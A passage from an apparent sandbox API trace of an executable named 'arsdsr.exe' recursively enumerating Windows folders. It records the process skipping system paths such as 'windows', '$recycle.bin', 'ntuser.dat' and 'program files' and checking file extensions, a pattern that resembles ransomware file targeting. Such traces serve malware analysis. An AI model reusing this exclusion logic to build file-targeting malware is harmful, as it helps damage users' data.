nFileSizeHigh=0x0, nFileSizeLow=0x30ada, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="MPLog-07132009-221054.log", cAlternateFileName="MPLOG-~1.LOG")) returned 1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2=".") returned 1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="..") returned 1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="...") returned 1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="windows") returned -1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="$recycle.bin") returned 1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="rsa") returned -1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="ntuser.dat") returned -1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="programdata") returned -1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="appdata") returned 1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="program files") returned -1 [0147.190] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="program files (x86)") returned -1 [0147.190] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\" [0147.190] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\", lpString2="MPLog-07132009-221054.log" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" [0147.190] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.190] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.191] PathFindExtensionW (pszPath="MPLog-07132009-221054.log") returned=".log" [0147.191] lstrcmpiW (lpString1=".log", lpString2=".exe") returned 1 [0147.191] lstrcmpiW (lpString1=".log", lpString2=".log") returned 0 [0147.191] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76792c22, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x798d48a0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x30ada, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="MPLog-07132009-221054.log", cAlternateFileName="MPLOG-~1.LOG")) returned 0 [0147.191] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0147.191] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Support", cAlternateFileName="")) returned 0 [0147.191] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0147.191] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2=".") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="..") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="...") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="windows") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="$recycle.bin") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="rsa") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="ntuser.dat") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="programdata") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="appdata") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="program files") returned 1 [0147.191] lstrcmpiW (lpString1="Windows NT", lpString2="program files (x86)") returned 1 [0147.191] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0147.191] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Windows NT" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT") returned="C:/Users\\All Users\\Microsoft\\Windows NT" [0147.191] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\" [0147.192] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\" [0147.192] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\*.*" [0147.192] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0147.192] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.192] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0147.192] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.192] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.192] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="MSFax", cAlternateFileName="")) returned 1 [0147.192] lstrcmpiW (lpString1="MSFax", lpString2=".") returned 1 [0147.192] lstrcmpiW (lpString1="MSFax", lpString2="..") returned 1 [0147.192] lstrcmpiW (lpString1="MSFax", lpString2="...") returned 1 [0147.192] lstrcmpiW (lpString1="MSFax", lpString2="windows") returned -1 [0147.192] lstrcmpiW (lpString1="MSFax", lpString2="$recycle.bin") returned 1 [0147.192] lstrcmpiW (lpString1="MSFax", lpString2="rsa") returned -1 [0147.192] lstrcmpiW (lpString1="MSFax", lpString2="ntuser.dat") returned -1 [0147.192] lstrcmpiW (lpString1="MSFax", lpString2="programdata") returned -1 [0147.193] lstrcmpiW (lpString1="MSFax", lpString2="appdata") returned 1 [0147.193] lstrcmpiW (lpString1="MSFax", lpString2="program files") returned -1 [0147.193] lstrcmpiW (lpString1="MSFax", lpString2="program files (x86)") returned -1 [0147.193] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\" [0147.193] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\", lpString2="MSFax" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax" [0147.193] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" [0147.193] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" [0147.193] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" [0147.193] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0147.199] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.199] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0147.199] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.199] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.199] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="ActivityLog", cAlternateFileName="ACTIVI~1")) returned 1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2=".") returned 1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="..") returned 1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="...") returned 1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="windows") returned -1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="$recycle.bin") returned 1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="rsa") returned -1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="ntuser.dat") returned -1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="programdata") returned -1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="appdata") returned -1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="program files") returned -1 [0147.199] lstrcmpiW (lpString1="ActivityLog", lpString2="program files (x86)") returned -1 [0147.199] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" [0147.199] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="ActivityLog" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0147.199] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\" [0147.199] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\" [0147.199] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*.*" [0147.199] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0147.200] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.200] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0147.200] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.200] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.200] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 0 [0147.200] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0147.200] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="Common Coverpages", cAlternateFileName="COMMON~1")) returned 1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2=".") returned 1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2="..") returned 1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2="...") returned 1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2="windows") returned -1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2="$recycle.bin") returned 1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2="rsa") returned -1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2="ntuser.dat") returned -1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2="programdata") returned -1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2="appdata") returned 1 [0147.200] lstrcmpiW (lpString1="Common Coverpages", lpString2="program files") returned -1 [0147.201] lstrcmpiW (lpString1="Common Coverpages", lpString2="program files (x86)") returned -1 [0147.201] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" [0147.201] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="Common Coverpages" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0147.201] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\" [0147.201] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\" [0147.201] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*" [0147.201] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0147.201] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.201] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0147.201] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.201] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.201] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="en-US", cAlternateFileName="")) returned 1 [0147.201] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0147.201] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0147.201] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0147.201] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0147.201] lstrcmpiW (lpString1="en-US", lpString2="$recycle.bin") returned 1 [0147.201] lstrcmpiW (lpString1="en-US", lpString2="rsa") returned -1 [0147.202] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0147.202] lstrcmpiW (lpString1="en-US", lpString2="programdata") returned -1 [0147.202] lstrcmpiW (lpString1="en-US", lpString2="appdata") returned 1 [0147.202] lstrcmpiW (lpString1="en-US", lpString2="program files") returned -1 [0147.202] lstrcmpiW (lpString1="en-US", lpString2="program files (x86)") returned -1 [0147.202] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\" [0147.202] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\", lpString2="en-US" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0147.202] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" [0147.202] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" [0147.202] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*.*" [0147.202] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x880086, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0147.202] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.202] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x880086, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0147.202] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.202] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.202] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x28aa, dwReserved0=0x880086, dwReserved1=0x295d670, cFileName="confident.cov", cAlternateFileName="")) returned 1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2=".") returned 1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="..") returned 1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="...") returned 1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="windows") returned -1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="$recycle.bin") returned 1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="rsa") returned -1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="ntuser.dat") returned -1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="programdata") returned -1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="appdata") returned 1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="program files") returned -1 [0147.203] lstrcmpiW (lpString1="confident.cov", lpString2="program files (x86)") returned -1 [0147.203] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" [0147.203] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\", lpString2="confident.cov" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" [0147.203] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.203] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.203] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0147.203] lstrcmpiW (lpString1=".cov", lpString2=".exe") returned -1 [0147.203] lstrcmpiW (lpString1=".cov", lpString2=".log") returned -1 [0147.203] lstrcmpiW 